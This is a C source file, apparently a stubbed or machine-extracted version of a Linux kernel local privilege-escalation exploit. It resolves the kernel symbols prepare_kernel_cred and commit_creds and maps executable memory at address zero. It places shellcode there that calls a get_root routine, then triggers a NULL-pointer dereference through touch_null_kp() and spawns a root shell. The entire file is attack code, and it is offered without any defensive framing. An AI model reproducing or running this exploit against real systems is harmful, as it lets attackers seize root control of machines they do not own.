
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int shellcode ;
typedef scalar_t__ prepare_kernel_cred_t ;
typedef scalar_t__ commit_creds_t ;


 int MAP_ANON ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 scalar_t__ commit_creds ;
 scalar_t__ get_kernel_sym (char*) ;
 void* get_root ;
 int get_shell () ;
 int memcpy (int ,unsigned char*,int) ;
 char* mmap (int ,int,int,int,int,int ) ;
 scalar_t__ prepare_kernel_cred ;
 int printf (char*,...) ;
 void** rawmemchr (unsigned char*,int) ;
 int touch_null_kp () ;

int main(int ac, char **av)
{


  prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
  commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
  printf("Got commit_creds:%p,prepare_kernel_cred%p\n", commit_creds, prepare_kernel_cred);


  printf("[+] Try to allocat 0x00000000...\n");
  if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
    printf("[-] Failed to allocat 0x00000000\n");
    return -1;
  }
  printf("[+] Allocation success !\n");
  unsigned char shellcode[] =
    { 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };

  void **get_root_offset = rawmemchr(shellcode, 0x42);
  (*get_root_offset) = get_root;

  memcpy(0, shellcode, sizeof(shellcode));


  touch_null_kp();

  get_shell();

}
